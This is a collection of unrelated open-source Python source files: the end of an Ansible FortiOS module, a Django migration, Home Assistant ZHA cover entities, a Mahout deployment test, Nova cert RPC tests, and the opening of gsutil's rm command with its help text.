"ip": {"required": False, "type": "str"},
"mapped_port": {"required": False, "type": "int"},
"name": {"required": True, "type": "str"},
"port": {"required": False, "type": "int"},
"ssl_algorithm": {"required": False, "type": "str",
"choices": ["high", "medium", "low"]},
"ssl_cert": {"required": False, "type": "str"},
"ssl_client_renegotiation": {"required": False, "type": "str",
"choices": ["allow", "deny", "secure"]},
"ssl_dh_bits": {"required": False, "type": "str",
"choices": ["768", "1024", "1536",
"2048"]},
"ssl_max_version": {"required": False, "type": "str",
"choices": ["tls-1.0", "tls-1.1", "tls-1.2"]},
"ssl_min_version": {"required": False, "type": "str",
"choices": ["tls-1.0", "tls-1.1", "tls-1.2"]},
"ssl_mode": {"required": False, "type": "str",
"choices": ["half", "full"]},
"ssl_send_empty_frags": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"url_rewrite": {"required": False, "type": "str",
"choices": ["enable", "disable"]}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
# legacy_mode refers to using fortiosapi instead of HTTPAPI
legacy_mode = 'host' in module.params and module.params['host'] is not None and \
'username' in module.params and module.params['username'] is not None and \
'password' in module.params and module.params['password'] is not None
if not legacy_mode:
if module._socket_path:
connection = Connection(module._socket_path)
fos = FortiOSHandler(connection)
is_error, has_changed, result = fortios_firewall(module.params, fos)
else:
module.fail_json(**FAIL_SOCKET_MSG)
else:
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
login(module.params, fos)
is_error, has_changed, result = fortios_firewall(module.params, fos)
fos.logout()
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| simonwydooghe/ansible | lib/ansible/modules/network/fortios/fortios_firewall_ssl_server.py | Python | gpl-3.0 | 15,241 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
from django.contrib.auth.models import User
from account.models import Account
class Migration(DataMigration):
def forwards(self, orm):
# we need to associate each user to an account object
for user in User.objects.all():
a = Account()
a.user = user
a.language = 'en' # default language
a.save()
def backwards(self, orm):
# we need to delete all the accounts records
Account.objects.all().delete()
models = {
'actstream.action': {
'Meta': {'ordering': "('-timestamp',)", 'object_name': 'Action'},
'action_object_content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'action_object'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'action_object_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'actor_content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'actor'", 'to': "orm['contenttypes.ContentType']"}),
'actor_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'data': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'target_content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'target'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'target_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 1, 14, 4, 17, 6, 973224)'}),
'verb': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 1, 14, 4, 17, 6, 974570)'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 1, 14, 4, 17, 6, 974509)'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'relationships': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_to'", 'symmetrical': 'False', 'through': "orm['relationships.Relationship']", 'to': "orm['auth.User']"}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'people.profile': {
'Meta': {'object_name': 'Profile'},
'area': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'delivery': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'organization': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'profile': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'profile'", 'unique': 'True', 'null': 'True', 'to': "orm['auth.User']"}),
'voice': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'zipcode': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'people.role': {
'Meta': {'object_name': 'Role'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'relationships.relationship': {
'Meta': {'ordering': "('created',)", 'unique_together': "(('from_user', 'to_user', 'status', 'site'),)", 'object_name': 'Relationship'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'from_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_users'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'relationships'", 'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['relationships.RelationshipStatus']"}),
'to_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_users'", 'to': "orm['auth.User']"}),
'weight': ('django.db.models.fields.FloatField', [], {'default': '1.0', 'null': 'True', 'blank': 'True'})
},
'relationships.relationshipstatus': {
'Meta': {'ordering': "('name',)", 'object_name': 'RelationshipStatus'},
'from_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'symmetrical_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'to_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'verb': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['people']
| GISPPU/GrenadaLandInformation | geonode/people/migrations/0003_link_users_to_account.py | Python | gpl-3.0 | 10,196 |
"""Support for ZHA covers."""
from __future__ import annotations
import asyncio
import functools
import logging
from zigpy.zcl.foundation import Status
from homeassistant.components.cover import (
ATTR_CURRENT_POSITION,
ATTR_POSITION,
DEVICE_CLASS_DAMPER,
DEVICE_CLASS_SHADE,
DOMAIN,
CoverEntity,
)
from homeassistant.const import STATE_CLOSED, STATE_CLOSING, STATE_OPEN, STATE_OPENING
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .core import discovery
from .core.const import (
CHANNEL_COVER,
CHANNEL_LEVEL,
CHANNEL_ON_OFF,
CHANNEL_SHADE,
DATA_ZHA,
DATA_ZHA_DISPATCHERS,
SIGNAL_ADD_ENTITIES,
SIGNAL_ATTR_UPDATED,
SIGNAL_SET_LEVEL,
)
from .core.registries import ZHA_ENTITIES
from .core.typing import ChannelType, ZhaDeviceType
from .entity import ZhaEntity
_LOGGER = logging.getLogger(__name__)
STRICT_MATCH = functools.partial(ZHA_ENTITIES.strict_match, DOMAIN)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Zigbee Home Automation cover from config entry."""
entities_to_create = hass.data[DATA_ZHA][DOMAIN]
unsub = async_dispatcher_connect(
hass,
SIGNAL_ADD_ENTITIES,
functools.partial(
discovery.async_add_entities, async_add_entities, entities_to_create
),
)
hass.data[DATA_ZHA][DATA_ZHA_DISPATCHERS].append(unsub)
@STRICT_MATCH(channel_names=CHANNEL_COVER)
class ZhaCover(ZhaEntity, CoverEntity):
"""Representation of a ZHA cover."""
def __init__(self, unique_id, zha_device, channels, **kwargs):
"""Init this sensor."""
super().__init__(unique_id, zha_device, channels, **kwargs)
self._cover_channel = self.cluster_channels.get(CHANNEL_COVER)
self._current_position = None
async def async_added_to_hass(self):
"""Run when about to be added to hass."""
await super().async_added_to_hass()
self.async_accept_signal(
self._cover_channel, SIGNAL_ATTR_UPDATED, self.async_set_position
)
@callback
def async_restore_last_state(self, last_state):
"""Restore previous state."""
self._state = last_state.state
if "current_position" in last_state.attributes:
self._current_position = last_state.attributes["current_position"]
@property
def is_closed(self):
"""Return if the cover is closed."""
if self.current_cover_position is None:
return None
return self.current_cover_position == 0
@property
def is_opening(self):
"""Return if the cover is opening or not."""
return self._state == STATE_OPENING
@property
def is_closing(self):
"""Return if the cover is closing or not."""
return self._state == STATE_CLOSING
@property
def current_cover_position(self):
"""Return the current position of ZHA cover.
None is unknown, 0 is closed, 100 is fully open.
"""
return self._current_position
@callback
def async_set_position(self, attr_id, attr_name, value):
"""Handle position update from channel."""
_LOGGER.debug("setting position: %s", value)
self._current_position = 100 - value
if self._current_position == 0:
self._state = STATE_CLOSED
elif self._current_position == 100:
self._state = STATE_OPEN
self.async_write_ha_state()
@callback
def async_update_state(self, state):
"""Handle state update from channel."""
_LOGGER.debug("state=%s", state)
self._state = state
self.async_write_ha_state()
async def async_open_cover(self, **kwargs):
"""Open the window cover."""
res = await self._cover_channel.up_open()
if isinstance(res, list) and res[1] is Status.SUCCESS:
self.async_update_state(STATE_OPENING)
async def async_close_cover(self, **kwargs):
"""Close the window cover."""
res = await self._cover_channel.down_close()
if isinstance(res, list) and res[1] is Status.SUCCESS:
self.async_update_state(STATE_CLOSING)
async def async_set_cover_position(self, **kwargs):
"""Move the roller shutter to a specific position."""
new_pos = kwargs[ATTR_POSITION]
res = await self._cover_channel.go_to_lift_percentage(100 - new_pos)
if isinstance(res, list) and res[1] is Status.SUCCESS:
self.async_update_state(
STATE_CLOSING if new_pos < self._current_position else STATE_OPENING
)
async def async_stop_cover(self, **kwargs):
"""Stop the window cover."""
res = await self._cover_channel.stop()
if isinstance(res, list) and res[1] is Status.SUCCESS:
self._state = STATE_OPEN if self._current_position > 0 else STATE_CLOSED
self.async_write_ha_state()
async def async_update(self):
"""Attempt to retrieve the open/close state of the cover."""
await super().async_update()
await self.async_get_state()
async def async_get_state(self, from_cache=True):
"""Fetch the current state."""
_LOGGER.debug("polling current state")
if self._cover_channel:
pos = await self._cover_channel.get_attribute_value(
"current_position_lift_percentage", from_cache=from_cache
)
_LOGGER.debug("read pos=%s", pos)
if pos is not None:
self._current_position = 100 - pos
self._state = (
STATE_OPEN if self.current_cover_position > 0 else STATE_CLOSED
)
else:
self._current_position = None
self._state = None
@STRICT_MATCH(channel_names={CHANNEL_LEVEL, CHANNEL_ON_OFF, CHANNEL_SHADE})
class Shade(ZhaEntity, CoverEntity):
"""ZHA Shade."""
_attr_device_class = DEVICE_CLASS_SHADE
def __init__(
self,
unique_id: str,
zha_device: ZhaDeviceType,
channels: list[ChannelType],
**kwargs,
) -> None:
"""Initialize the ZHA light."""
super().__init__(unique_id, zha_device, channels, **kwargs)
self._on_off_channel = self.cluster_channels[CHANNEL_ON_OFF]
self._level_channel = self.cluster_channels[CHANNEL_LEVEL]
self._position = None
self._is_open = None
@property
def current_cover_position(self):
"""Return current position of cover.
None is unknown, 0 is closed, 100 is fully open.
"""
return self._position
@property
def is_closed(self) -> bool | None:
"""Return True if shade is closed."""
if self._is_open is None:
return None
return not self._is_open
async def async_added_to_hass(self):
"""Run when about to be added to hass."""
await super().async_added_to_hass()
self.async_accept_signal(
self._on_off_channel, SIGNAL_ATTR_UPDATED, self.async_set_open_closed
)
self.async_accept_signal(
self._level_channel, SIGNAL_SET_LEVEL, self.async_set_level
)
@callback
def async_restore_last_state(self, last_state):
"""Restore previous state."""
self._is_open = last_state.state == STATE_OPEN
if ATTR_CURRENT_POSITION in last_state.attributes:
self._position = last_state.attributes[ATTR_CURRENT_POSITION]
@callback
def async_set_open_closed(self, attr_id: int, attr_name: str, value: bool) -> None:
"""Set open/closed state."""
self._is_open = bool(value)
self.async_write_ha_state()
@callback
def async_set_level(self, value: int) -> None:
"""Set the reported position."""
value = max(0, min(255, value))
self._position = int(value * 100 / 255)
self.async_write_ha_state()
async def async_open_cover(self, **kwargs):
"""Open the window cover."""
res = await self._on_off_channel.on()
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't open cover: %s", res)
return
self._is_open = True
self.async_write_ha_state()
async def async_close_cover(self, **kwargs):
"""Close the window cover."""
res = await self._on_off_channel.off()
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't open cover: %s", res)
return
self._is_open = False
self.async_write_ha_state()
async def async_set_cover_position(self, **kwargs):
"""Move the roller shutter to a specific position."""
new_pos = kwargs[ATTR_POSITION]
res = await self._level_channel.move_to_level_with_on_off(
new_pos * 255 / 100, 1
)
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't set cover's position: %s", res)
return
self._position = new_pos
self.async_write_ha_state()
async def async_stop_cover(self, **kwargs) -> None:
"""Stop the cover."""
res = await self._level_channel.stop()
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't stop cover: %s", res)
return
@STRICT_MATCH(
channel_names={CHANNEL_LEVEL, CHANNEL_ON_OFF}, manufacturers="Keen Home Inc"
)
class KeenVent(Shade):
"""Keen vent cover."""
_attr_device_class = DEVICE_CLASS_DAMPER
async def async_open_cover(self, **kwargs):
"""Open the cover."""
position = self._position or 100
tasks = [
self._level_channel.move_to_level_with_on_off(position * 255 / 100, 1),
self._on_off_channel.on(),
]
results = await asyncio.gather(*tasks, return_exceptions=True)
if any(isinstance(result, Exception) for result in results):
self.debug("couldn't open cover")
return
self._is_open = True
self._position = position
self.async_write_ha_state()
| lukas-hetzenecker/home-assistant | homeassistant/components/zha/cover.py | Python | apache-2.0 | 10,222 |
#!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import amulet
class TestDeploy(unittest.TestCase):
"""
Deployment and smoke test for Apache Bigtop Mahout.
"""
@classmethod
def setUpClass(cls):
cls.d = amulet.Deployment(series='xenial')
cls.d.add('mahout')
cls.d.add('client', charm='hadoop-client')
cls.d.add('namenode', charm='hadoop-namenode')
cls.d.add('resourcemanager', charm='hadoop-resourcemanager')
cls.d.add('slave', charm='hadoop-slave')
cls.d.add('plugin', charm='hadoop-plugin')
cls.d.relate('plugin:hadoop-plugin', 'client:hadoop')
cls.d.relate('plugin:namenode', 'namenode:namenode')
cls.d.relate('plugin:resourcemanager', 'resourcemanager:resourcemanager')
cls.d.relate('slave:namenode', 'namenode:datanode')
cls.d.relate('slave:resourcemanager', 'resourcemanager:nodemanager')
cls.d.relate('namenode:namenode', 'resourcemanager:namenode')
cls.d.relate('mahout:mahout', 'client:mahout')
cls.d.setup(timeout=3600)
cls.d.sentry.wait_for_messages({"mahout": "ready"}, timeout=3600)
cls.mahout = cls.d.sentry['mahout'][0]
def test_mahout(self):
"""
Validate Mahout by running the smoke-test action.
"""
uuid = self.mahout.run_action('smoke-test')
result = self.d.action_fetch(uuid, full_output=True)
# action status=completed on success
if (result['status'] != "completed"):
self.fail('Mahout smoke-test failed: %s' % result)
if __name__ == '__main__':
unittest.main()
| welikecloud/bigtop | bigtop-packages/src/charm/mahout/layer-mahout/tests/01-mahout-test.py | Python | apache-2.0 | 2,393 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for nova.cert.rpcapi
"""
from nova.cert import rpcapi as cert_rpcapi
from nova import context
from nova import flags
from nova.openstack.common import rpc
from nova import test
FLAGS = flags.FLAGS
class CertRpcAPITestCase(test.TestCase):
def setUp(self):
super(CertRpcAPITestCase, self).setUp()
def tearDown(self):
super(CertRpcAPITestCase, self).tearDown()
def _test_cert_api(self, method, **kwargs):
ctxt = context.RequestContext('fake_user', 'fake_project')
rpcapi = cert_rpcapi.CertAPI()
expected_retval = 'foo'
expected_msg = rpcapi.make_msg(method, **kwargs)
expected_msg['version'] = rpcapi.BASE_RPC_API_VERSION
self.call_ctxt = None
self.call_topic = None
self.call_msg = None
self.call_timeout = None
def _fake_call(_ctxt, _topic, _msg, _timeout):
self.call_ctxt = _ctxt
self.call_topic = _topic
self.call_msg = _msg
self.call_timeout = _timeout
return expected_retval
self.stubs.Set(rpc, 'call', _fake_call)
retval = getattr(rpcapi, method)(ctxt, **kwargs)
self.assertEqual(retval, expected_retval)
self.assertEqual(self.call_ctxt, ctxt)
self.assertEqual(self.call_topic, FLAGS.cert_topic)
self.assertEqual(self.call_msg, expected_msg)
self.assertEqual(self.call_timeout, None)
def test_revoke_certs_by_user(self):
self._test_cert_api('revoke_certs_by_user', user_id='fake_user_id')
def test_revoke_certs_by_project(self):
self._test_cert_api('revoke_certs_by_project',
project_id='fake_project_id')
def test_revoke_certs_by_user_and_project(self):
self._test_cert_api('revoke_certs_by_user_and_project',
user_id='fake_user_id',
project_id='fake_project_id')
def test_generate_x509_cert(self):
self._test_cert_api('generate_x509_cert',
user_id='fake_user_id',
project_id='fake_project_id')
def test_fetch_ca(self):
self._test_cert_api('fetch_ca', project_id='fake_project_id')
def test_fetch_crl(self):
self._test_cert_api('fetch_crl', project_id='fake_project_id')
def test_decrypt_text(self):
self._test_cert_api('decrypt_text',
project_id='fake_project_id', text='blah')
| tylertian/Openstack | openstack F/nova/nova/tests/cert/test_rpcapi.py | Python | apache-2.0 | 3,147 |
# -*- coding: utf-8 -*-
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of Unix-like rm command for cloud storage providers."""
from __future__ import absolute_import
import time
from gslib.cloud_api import BucketNotFoundException
from gslib.cloud_api import NotEmptyException
from gslib.cloud_api import NotFoundException
from gslib.cloud_api import ServiceException
from gslib.command import Command
from gslib.command import DecrementFailureCount
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.exception import NO_URLS_MATCHED_GENERIC
from gslib.exception import NO_URLS_MATCHED_TARGET
from gslib.name_expansion import NameExpansionIterator
from gslib.name_expansion import SeekAheadNameExpansionIterator
from gslib.parallelism_framework_util import PutToQueueWithTimeout
from gslib.storage_url import StorageUrlFromString
from gslib.thread_message import MetadataMessage
from gslib.translation_helper import PreconditionsFromHeaders
from gslib.util import GetCloudApiInstance
from gslib.util import NO_MAX
from gslib.util import Retry
from gslib.util import StdinIterator
_SYNOPSIS = """
gsutil rm [-f] [-r] url...
gsutil rm [-f] [-r] -I
"""
_DETAILED_HELP_TEXT = ("""
<B>SYNOPSIS</B>
""" + _SYNOPSIS + """
<B>DESCRIPTION</B>
The gsutil rm command removes objects.
For example, the command:
gsutil rm gs://bucket/subdir/*
will remove all objects in gs://bucket/subdir, but not in any of its
sub-directories. In contrast:
gsutil rm gs://bucket/subdir/**
will remove all objects under gs://bucket/subdir or any of its
subdirectories.
You can also use the -r option to specify recursive object deletion. Thus, for
example, either of the following two commands will remove gs://bucket/subdir
and all objects and subdirectories under it:
gsutil rm gs://bucket/subdir**
gsutil rm -r gs://bucket/subdir
The -r option will also delete all object versions in the subdirectory for
versioning-enabled buckets, whereas the ** command will only delete the live
version of each object in the subdirectory.
Running gsutil rm -r on a bucket will delete all versions of all objects in
the bucket, and then delete the bucket:
gsutil rm -r gs://bucket
If you want to delete all objects in the bucket, but not the bucket itself,
this command will work:
gsutil rm gs://bucket/**
If you have a large number of objects to remove you might want to use the
gsutil -m option, to perform parallel (multi-threaded/multi-processing)
removes:
gsutil -m rm -r gs://my_bucket/subdir
You can pass a list of URLs (one per line) to remove on stdin instead of as
command line arguments by using the -I option. This allows you to use gsutil
in a pipeline to remove objects identified by a program, such as:
some_program | gsutil -m rm -I
The contents of stdin can name cloud URLs and wildcards of cloud URLs.
Note that gsutil rm will refuse to remove files from the local
file system. For example this will fail:
gsutil rm *.txt
WARNING: Object removal cannot be undone. Google Cloud Storage is designed
to give developers a high amount of flexibility and control over their data,
and Google maintains strict controls over the processing and purging of
deleted data. To protect yourself from mistakes, you can configure object
versioning on your bucket(s). See 'gsutil help versions' for details.
<B>DATA RESTORATION FROM ACCIDENTAL DELETION OR OVERWRITES</B>
Google Cloud Storage does not provide support for restoring data lost
or overwritten due to customer errors. If you have concerns that your
application software (or your users) may at some point erroneously delete or
overwrite data, you can protect yourself from that risk by enabling Object
Versioning (see "gsutil help versioning"). Doing so increases storage costs,
which can be partially mitigated by configuring Lifecycle Management to delete
older object versions (see "gsutil help lifecycle").
<B>OPTIONS</B>
-f Continues silently (without printing error messages) despite
errors when removing multiple objects. If some of the objects
could not be removed, gsutil's exit status will be non-zero even
if this flag is set. Execution will still halt if an inaccessible
bucket is encountered. This option is implicitly set when running
"gsutil -m rm ...".
-I Causes gsutil to read the list of objects to remove from stdin.
This allows you to run a program that generates the list of
objects to remove.
-R, -r The -R and -r options are synonymous. Causes bucket or bucket
subdirectory contents (all objects and subdirectories that it
contains) to be removed recursively. If used with a bucket-only
URL (like gs://bucket), after deleting objects and subdirectories
gsutil will delete the bucket. This option implies the -a option
and will delete all object versions.
-a Delete all versions of an object.
""")
def _RemoveExceptionHandler(cls, e):
"""Simple exception handler to allow post-completion status."""
if not cls.continue_on_error:
cls.logger.error(str(e))
# TODO: Use shared state to track missing bucket names when we get a
# BucketNotFoundException. Then improve bucket removal logic and exception
# messages.
if isinstance(e, BucketNotFoundException):
cls.bucket_not_found_count += 1
cls.logger.error(str(e))
else:
if _ExceptionMatchesBucketToDelete(cls.bucket_strings_to_delete, e):
DecrementFailureCount()
else:
cls.op_failure_count += 1
# pylint: disable=unused-argument
def _RemoveFoldersExceptionHandler(cls, e):
"""When removing folders, we don't mind if none exist."""
if ((isinstance(e, CommandException) and
NO_URLS_MATCHED_GENERIC in e.reason)
or isinstance(e, NotFoundException)):
DecrementFailureCount()
else:
raise e
def _RemoveFuncWrapper(cls, name_expansion_result, thread_state=None):
cls.RemoveFunc(name_expansion_result, thread_state=thread_state)
def _ExceptionMatchesBucketToDelete(bucket_strings_to_delete, e):
"""Returns True if the exception matches a bucket slated for deletion.
A recursive delete call on an empty bucket will raise an exception when
listing its objects, but if we plan to delete the bucket that shouldn't
result in a user-visible error.
Args:
bucket_strings_to_delete: Buckets slated for recursive deletion.
e: Exception to check.
Returns:
True if the exception was a no-URLs-matched exception and it matched
one of bucket_strings_to_delete, None otherwise.
"""
if bucket_strings_to_delete:
msg = NO_URLS_MATCHED_TARGET % ''
if msg in str(e):
parts = str(e).split(msg)
return len(parts) == 2 and parts[1] in bucket_strings_to_delete
class RmCommand(Command):
"""Implementation of gsutil rm command."""
# Command specification. See base class for documentation.
command_spec = Command.CreateCommandSpec(
'rm',
command_name_aliases=['del', 'delete', 'remove'],
usage_synopsis=_SYNOPSIS,
min_args=0,
max_args=NO_MAX,
supported_sub_args='afIrR',
file_url_ok=False,
provider_url_ok=False,
urls_start_arg=0,
gs_api_support=[ApiSelector.XML, ApiSelector.JSON],
gs_default_api=ApiSelector.JSON,
argparse_arguments=[
CommandArgument.MakeZeroOrMoreCloudURLsArgument()
]
)
# Help specification. See help_provider.py for documentation.
help_spec = Command.HelpSpec(
help_name='rm',
help_name_aliases=['del', 'delete', 'remove'],
help_type='command_help',
help_one_line_summary='Remove objects',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={},
)
def RunCommand(self):
"""Command entry point for the rm command."""
# self.recursion_requested is initialized in command.py (so it can be
# checked in parent class for all commands).
self.continue_on_error = self.parallel_operations
self.read_args_from_stdin = False
self.all_versions = False
if self.sub_opts:
for o, unused_a in self.sub_opts:
if o == '-a':
self.all_versions = True
elif o == '-f':
self.continue_on_error = True
elif o == '-I':
self.read_args_from_stdin = True
elif o == '-r' or o == '-R':
self.recursion_requested = True
self.all_versions = True
if self.read_args_from_stdin:
if self.args:
raise CommandException('No arguments allowed with the -I flag.')
url_strs = StdinIterator()
else:
if not self.args:
raise CommandException('The rm command (without -I) expects at '
'least one URL.')
url_strs = self.args
# Tracks number of object deletes that failed.
self.op_failure_count = 0
# Tracks if any buckets were missing.
self.bucket_not_found_count = 0
# Tracks buckets that are slated for recursive deletion.
bucket_urls_to_delete = []
self.bucket_strings_to_delete = []
if self.recursion_requested:
bucket_fields = ['id']
for url_str in url_strs:
url = StorageUrlFromString(url_str)
if url.IsBucket() or url.IsProvider():
for blr in self.WildcardIterator(url_str).IterBuckets(
bucket_fields=bucket_fields):
bucket_urls_to_delete.append(blr.storage_url)
self.bucket_strings_to_delete.append(url_str)
self.preconditions = PreconditionsFromHeaders(self.headers or {})
try:
# Expand wildcards, dirs, buckets, and bucket subdirs in URLs.
name_expansion_iterator = NameExpansionIterator(
self.command_name, self.debug, self.logger, self.gsutil_api,
url_strs, self.recursion_requested, project_id=self.project_id,
all_versions=self.all_versions,
continue_on_error=self.continue_on_error or self.parallel_operations)
seek_ahead_iterator = None
